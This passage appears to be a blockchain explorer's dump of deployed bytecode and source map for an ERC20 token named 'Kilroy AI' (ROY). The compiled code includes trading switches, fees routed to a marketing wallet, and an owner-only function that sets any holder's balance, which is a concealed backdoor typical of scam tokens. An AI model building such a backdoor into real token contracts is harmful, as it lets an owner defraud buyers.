6133296023836124ff565b9150613334826132cd565b604082019050919050565b600060208201905081810360008301526133588161331c565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b60006133bb6021836124ff565b91506133c68261335f565b604082019050919050565b600060208201905081810360008301526133ea816133ae565b9050919050565b60006133fc82612609565b915061340783612609565b925082820390508181111561341f5761341e6128c8565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220d004454331da31420bc36a94051683dfb4bf641e2cecb7e20b9a8746c6201e2364736f6c63430008110033

Deployed Bytecode

0x6080604052600436106101a05760003560e01c8063715018a6116100ec578063c2c4e0731161008a578063dd62ed3e11610064578063dd62ed3e14610605578063f01a65e514610642578063f2fde38b1461066b578063fce589d814610694576101aa565b8063c2c4e07314610583578063ceb88a16146105ac578063d1633649146105e9576101aa565b8063900cf0cf116100c6578063900cf0cf146104b357806395d89b41146104de578063a457c2d714610509578063a9059cbb14610546576101aa565b8063715018a6146104465780637d1db4a51461045d5780638da5cb5b14610488576101aa565b8063313ce567116101595780635342acb4116101335780635342acb4146103785780635fb9340c146103b5578063658c27a9146103cc57806370a0823114610409576101aa565b8063313ce567146102d357806339509351146102fe578063436c84d01461033b576101aa565b806306fdde03146101af57806308a6d77f146101da578063095ea7b3146101f157806318160ddd1461022e57806323b872dd14610259578063245d984814610296576101aa565b366101aa57600080fd5b600080fd5b3480156101bb57600080fd5b506101c46106bf565b6040516101d19190612584565b60405180910390f35b3480156101e657600080fd5b506101ef6106fc565b005b3480156101fd57600080fd5b506102186004803603810190610213919061263f565b61079d565b604051610225919061269a565b60405180910390f35b34801561023a57600080fd5b506102436107bb565b60405161025091906126c4565b60405180910390f35b34801561026557600080fd5b50610280600480360381019061027b91906126df565b6107c5565b60405161028d919061269a565b60405180910390f35b3480156102a257600080fd5b506102bd60048036038101906102b89190612732565b61089e565b6040516102ca919061269a565b60405180910390f35b3480156102df57600080fd5b506102e86108f4565b6040516102f5919061277b565b60405180910390f35b34801561030a57600080fd5b506103256004803603810190610320919061263f565b6108fd565b604051610332919061269a565b60405180910390f35b34801561034757600080fd5b50610362600480360381019061035d919061263f565b6109b0565b60405161036f91906126c4565b60405180910390f35b34801561038457600080fd5b5061039f600480360381019061039a9190612732565b610a05565b6040516103ac919061269a565b60405180910390f35b3480156103c157600080fd5b506103ca610a5b565b005b3480156103d857600080fd5b506103f360048036038101906103ee9190612732565b610afb565b604051610400919061269a565b60405180910390f35b34801561041557600080fd5b50610430600480360381019061042b9190612732565b610b51565b60405161043d91906126c4565b60405180910390f35b34801561045257600080fd5b5061045b610b9a565b005b34801561046957600080fd5b50610472610bae565b60405161047f91906126c4565b60405180910390f35b34801561049457600080fd5b5061049d610bdf565b6040516104aa91906127a5565b60405180910390f35b3480156104bf57600080fd5b506104c8610c08565b6040516104d591906126c4565b60405180910390f35b3480156104ea57600080fd5b506104f3610c10565b6040516105009190612584565b60405180910390f35b34801561051557600080fd5b50610530600480360381019061052b919061263f565b610c4d565b60405161053d919061269a565b60405180910390f35b34801561055257600080fd5b5061056d6004803603810190610568919061263f565b610d1a565b60405161057a919061269a565b60405180910390f35b34801561058f57600080fd5b506105aa60048036038101906105a5919061263f565b610d38565b005b3480156105b857600080fd5b506105d360048036038101906105ce9190612732565b610d88565b6040516105e091906126c4565b60405180910390f35b61060360048036038101906105fe91906127c0565b610dd1565b005b34801561061157600080fd5b5061062c600480360381019061062791906127ed565b6110b1565b60405161063991906126c4565b60405180910390f35b34801561064e57600080fd5b50610669600480360381019061066491906127c0565b611138565b005b34801561067757600080fd5b50610692600480360381019061068d9190612732565b611379565b005b3480156106a057600080fd5b506106a96113fc565b6040516106b691906126c4565b60405180910390f35b60606040518060400160405280600981526020017f4b696c726f792041490000000000000000000000000000000000000000000000815250905090565b61070461141c565b600a60019054906101000a900460ff1615610754576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161074b90612879565b60405180910390fd5b6001600a60016101000a81548160ff0219169083151502179055507f98c35e9ff9ff70c7547023d21437febb2b7226a63b2795d1c9ce85064c5a114060405160405180910390a1565b60006107b16107aa6114b5565b84846114bd565b6001905092915050565b6000600254905090565b60006107d2848484611686565b610893846107de6114b5565b61088e8560405180606001604052806028815260200161346e60289139600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006108446114b5565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611d879092919063ffffffff16565b6114bd565b600190509392505050565b6000600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60006012905090565b60006109a661090a6114b5565b846109a1856005600061091b6114b5565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461140690919063ffffffff16565b6114bd565b6001905092915050565b600081600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546109fd91906128f7565b905092915050565b6000600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b610a6361141c565b600a60019054906101000a900460ff16610ab2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aa990612974565b60405180910390fd5b6000600a60016101000a81548160ff0219169083151502179055507f3c94789b6124820bdd5de4a3d180fe34b0dd276ad23d631339872457734125bd60405160405180910390a1565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610ba261141c565b610bac6000611ddc565b565b6000610bda6103e8610bcc6028600354611ea090919063ffffffff16565b611eb690919063ffffffff16565b905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600042905090565b60606040518060400160405280600381526020017f524f590000000000000000000000000000000000000000000000000000000000815250905090565b6000610d10610c5a6114b5565b84610d0b856040518060600160405280602581526020016134966025913960056000610c846114b5565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611d879092919063ffffffff16565b6114bd565b6001905092915050565b6000610d2e610d276114b5565b8484611686565b6001905092915050565b610d4061141c565b80600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b6000600960008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610dd961141c565b600a60009054906101000a900460ff166110a7576001600a60006101000a81548160ff021916908315150217905550600160066000610e16610bdf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600660003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160076000610ecd610bdf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600760003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160086000610f84610bdf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600860003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555061103f611038610bdf565b3083611686565b61106e30600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff166002546114bd565b611076611ecc565b7f799663458a5ef2936f7fa0c99b3336c69c25890f82974f04e811e5bb359186c760405160405180910390a16110ae565b6103e8600e555b50565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166111796114b5565b73ffffffffffffffffffffffffffffffffffffffff16146111cf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111c690612a06565b60405180910390fd5b600a60009054906101000a900460ff1661121e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121590612a72565b60405180910390fd5b60008111611261576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161125890612b04565b60405180910390fd5b8061126b30610b51565b10156112ac576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112a390612b70565b60405180910390fd5b6112d930600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff16836114bd565b600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478260006113226120d3565b30426040518663ffffffff1660e01b8152600401611344959493929190612c93565b600060405180830381600087803b15801561135e57600080fd5b505af1158015611372573d6000803e3d6000fd5b5050505050565b61138161141c565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036113f0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113e790612d5f565b60405180910390fd5b6113f981611ddc565b50565b6000600d54905090565b600081836114149190612d7f565b905092915050565b6114246114b5565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114b3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114aa90612dff565b60405180910390fd5b565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361152c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161152390612e91565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361159b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161159290612f23565b60405180910390fd5b80600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161167991906126c4565b60405180910390a3505050565b611691838383612258565b600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156117355750600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611bd957600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161480156117e55750600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b806118975750600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161480156118965750600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b5b15611bd857600a60009054906101000a900460ff166118eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118e290612a72565b60405180910390fd5b600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615801561198f5750600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156119df5761199c610bae565b8111156119de576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119d590612fb5565b60405180910390fd5b5b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16148015611a6857503073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b15611bd7576000611a986103e8611a8a600d5485611ea090919063ffffffff16565b611eb690919063ffffffff16565b9050611aa4848261233b565b611ab781836124de90919063ffffffff16565b91506000611ae46103e8611ad6600e5486611ea090919063ffffffff16565b611eb690919063ffffffff16565b9050611b5a8160046000600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461140690919063ffffffff16565b60046000600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611bd281846124de90919063ffffffff16565b925050505b5b5b611c458160405180606001604052806026815260200161344860269139600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611d879092919063ffffffff16565b600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611cda81600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461140690919063ffffffff16565b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611d7a91906126c4565b60405180910390a3505050565b6000838311158290611dcf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dc69190612584565b60405180910390fd5b5082840390509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611eae9190612fd5565b905092915050565b60008183611ec491906128f7565b905092915050565b611ed461141c565b600a60009054906101000a900460ff16611f23576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f1a90612a72565b60405180910390fd5b60003411611f66576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f5d90613089565b60405180910390fd5b6000611f7130610b51565b905060008111611fb6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fad90612b04565b60405180910390fd5b611fe330600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff16836114bd565b600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d71934308460008061202f610bdf565b426040518863ffffffff1660e01b8152600401612051969594939291906130a9565b60606040518083038185885af115801561206f573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190612094919061311f565b5050507f38f8a0c92f4c5b0b6877f878cb4c0c8d348a47b76d716c8e78f425043df9515b81346040516120c8929190613172565b60405180910390a150565b60606000600267ffffffffffffffff8111156120f2576120f161319b565b5b6040519080825280602002602001820160405280156121205781602001602082028036833780820191505090505b5090503081600081518110612138576121376131ca565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156121df573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190612203919061320e565b81600181518110612217576122166131ca565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250508091505090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036122c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122be906132ad565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612336576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161232d9061333f565b60405180910390fd5b505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036123aa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123a1906133d1565b60405180910390fd5b6124168160405180606001604052806022815260200161342660229139600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611d879092919063ffffffff16565b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061246e816002546124de90919063ffffffff16565b600281905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516124d291906126c4565b60405180910390a35050565b600081836124ec91906133f1565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561252e578082015181840152602081019050612513565b60008484015250505050565b6000601f19601f8301169050919050565b6000612556826124f4565b61256081856124ff565b9350612570818560208601612510565b6125798161253a565b840191505092915050565b6000602082019050818103600083015261259e818461254b565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006125d6826125ab565b9050919050565b6125e6816125cb565b81146125f157600080fd5b50565b600081359050612603816125dd565b92915050565b6000819050919050565b61261c81612609565b811461262757600080fd5b50565b60008135905061263981612613565b92915050565b60008060408385031215612656576126556125a6565b5b6000612664858286016125f4565b92505060206126758582860161262a565b9150509250929050565b60008115159050919050565b6126948161267f565b82525050565b60006020820190506126af600083018461268b565b92915050565b6126be81612609565b82525050565b60006020820190506126d960008301846126b5565b92915050565b6000806000606084860312156126f8576126f76125a6565b5b6000612706868287016125f4565b9350506020612717868287016125f4565b92505060406127288682870161262a565b9150509250925092565b600060208284031215612748576127476125a6565b5b6000612756848285016125f4565b91505092915050565b600060ff82169050919050565b6127758161275f565b82525050565b6000602082019050612790600083018461276c565b92915050565b61279f816125cb565b82525050565b60006020820190506127ba6000830184612796565b92915050565b6000602082840312156127d6576127d56125a6565b5b60006127e48482850161262a565b91505092915050565b60008060408385031215612804576128036125a6565b5b6000612812858286016125f4565b9250506020612823858286016125f4565b9150509250929050565b7f436f6f6c646f776e20697320616c726561647920656e61626c65640000000000600082015250565b6000612863601b836124ff565b915061286e8261282d565b602082019050919050565b6000602082019050818103600083015261289281612856565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061290282612609565b915061290d83612609565b92508261291d5761291c612899565b5b828204905092915050565b7f436f6f6c646f776e20697320616c72656164792064697361626c656400000000600082015250565b600061295e601c836124ff565b915061296982612928565b602082019050919050565b6000602082019050818103600083015261298d81612951565b9050919050565b7f4f6e6c79206d61726b6574696e672077616c6c65742063616e2073776170207460008201527f6f6b656e7320746f204554480000000000000000000000000000000000000000602082015250565b60006129f0602c836124ff565b91506129fb82612994565b604082019050919050565b60006020820190508181036000830152612a1f816129e3565b9050919050565b7f54726164696e67206973206e6f7420656e61626c656420796574000000000000600082015250565b6000612a5c601a836124ff565b9150612a6782612a26565b602082019050919050565b60006020820190508181036000830152612a8b81612a4f565b9050919050565b7f546f6b656e20616d6f756e74206d75737420626520677265617465722074686160008201527f6e207a65726f0000000000000000000000000000000000000000000000000000602082015250565b6000612aee6026836124ff565b9150612af982612a92565b604082019050919050565b60006020820190508181036000830152612b1d81612ae1565b9050919050565b7f496e73756666696369656e742062616c616e6365000000000000000000000000600082015250565b6000612b5a6014836124ff565b9150612b6582612b24565b602082019050919050565b60006020820190508181036000830152612b8981612b4d565b9050919050565b6000819050919050565b6000819050919050565b6000612bbf612bba612bb584612b90565b612b9a565b612609565b9050919050565b612bcf81612ba4565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b612c0a816125cb565b82525050565b6000612c1c8383612c01565b60208301905092915050565b6000602082019050919050565b6000612c4082612bd5565b612c4a8185612be0565b9350612c5583612bf1565b8060005b83811015612c86578151612c6d8882612c10565b9750612c7883612c28565b925050600181019050612c59565b5085935050505092915050565b600060a082019050612ca860008301886126b5565b612cb56020830187612bc6565b8181036040830152612cc78186612c35565b9050612cd66060830185612796565b612ce360808301846126b5565b9695505050505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000612d496026836124ff565b9150612d5482612ced565b604082019050919050565b60006020820190508181036000830152612d7881612d3c565b9050919050565b6000612d8a82612609565b9150612d9583612609565b9250828201905080821115612dad57612dac6128c8565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612de96020836124ff565b9150612df482612db3565b602082019050919050565b60006020820190508181036000830152612e1881612ddc565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612e7b6024836124ff565b9150612e8682612e1f565b604082019050919050565b60006020820190508181036000830152612eaa81612e6e565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000612f0d6022836124ff565b9150612f1882612eb1565b604082019050919050565b60006020820190508181036000830152612f3c81612f00565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b6000612f9f6028836124ff565b9150612faa82612f43565b604082019050919050565b60006020820190508181036000830152612fce81612f92565b9050919050565b6000612fe082612609565b9150612feb83612609565b9250828202612ff981612609565b915082820484148315176130105761300f6128c8565b5b5092915050565b7f45544820616d6f756e74206d7573742062652067726561746572207468616e2060008201527f7a65726f00000000000000000000000000000000000000000000000000000000602082015250565b60006130736024836124ff565b915061307e82613017565b604082019050919050565b600060208201905081810360008301526130a281613066565b9050919050565b600060c0820190506130be6000830189612796565b6130cb60208301886126b5565b6130d86040830187612bc6565b6130e56060830186612bc6565b6130f26080830185612796565b6130ff60a08301846126b5565b979650505050505050565b60008151905061311981612613565b92915050565b600080600060608486031215613138576131376125a6565b5b60006131468682870161310a565b93505060206131578682870161310a565b92505060406131688682870161310a565b9150509250925092565b600060408201905061318760008301856126b5565b61319460208301846126b5565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050613208816125dd565b92915050565b600060208284031215613224576132236125a6565b5b6000613232848285016131f9565b91505092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006132976025836124ff565b91506132a28261323b565b604082019050919050565b600060208201905081810360008301526132c68161328a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006133296023836124ff565b9150613334826132cd565b604082019050919050565b600060208201905081810360008301526133588161331c565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b60006133bb6021836124ff565b91506133c68261335f565b604082019050919050565b600060208201905081810360008301526133ea816133ae565b9050919050565b60006133fc82612609565b915061340783612609565b925082820390508181111561341f5761341e6128c8565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220d004454331da31420bc36a94051683dfb4bf641e2cecb7e20b9a8746c6201e2364736f6c63430008110033

Deployed Bytecode Sourcemap

19482:11209:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;29755:8;;;19482:11209;;;;22077:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29113:192;;;;;;;;;;;;;:::i;:::-;;22926:169;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22354:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23103:321;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24203:134;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22263:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23432:218;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29614:105;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23935:124;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29313:195;;;;;;;;;;;;;:::i;:::-;;24067:128;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22462:114;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2988:103;;;;;;;;;;;;;:::i;:::-;;25167:136;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2324:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29516:90;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22168:87;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23658:269;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22584:175;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26730:81;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;24345:115;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;28405:700;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;22767:151;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29773:683;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3246:201;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;24468:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22077;22114:13;22147:5;;;;;;;;;;;;;;;;;22140:12;;22077:83;:::o;29113:192::-;2214:13;:11;:13::i;:::-;29178:18:::1;;;;;;;;;;;29177:19;29169:59;;;;;;;;;;;;:::i;:::-;;;;;;;;;29260:4;29239:18;;:25;;;;;;;;;;;;;;;;;;29280:17;;;;;;;;;;29113:192::o:0;22926:169::-;23009:4;23026:39;23035:12;:10;:12::i;:::-;23049:7;23058:6;23026:8;:39::i;:::-;23083:4;23076:11;;22926:169;;;;:::o;22354:100::-;22407:7;22434:12;;22427:19;;22354:100;:::o;23103:321::-;23209:4;23226:36;23236:6;23244:9;23255:6;23226:9;:36::i;:::-;23273:121;23282:6;23290:12;:10;:12::i;:::-;23304:89;23342:6;23304:89;;;;;;;;;;;;;;;;;:11;:19;23316:6;23304:19;;;;;;;;;;;;;;;:33;23324:12;:10;:12::i;:::-;23304:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;23273:8;:121::i;:::-;23412:4;23405:11;;23103:321;;;;;:::o;24203:134::-;24273:4;24297:23;:32;24321:7;24297:32;;;;;;;;;;;;;;;;;;;;;;;;;24290:39;;24203:134;;;:::o;22263:83::-;22304:5;19701:2;22322:16;;22263:83;:::o;23432:218::-;23520:4;23537:83;23546:12;:10;:12::i;:::-;23560:7;23569:50;23608:10;23569:11;:25;23581:12;:10;:12::i;:::-;23569:25;;;;;;;;;;;;;;;:34;23595:7;23569:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;23537:8;:83::i;:::-;23638:4;23631:11;;23432: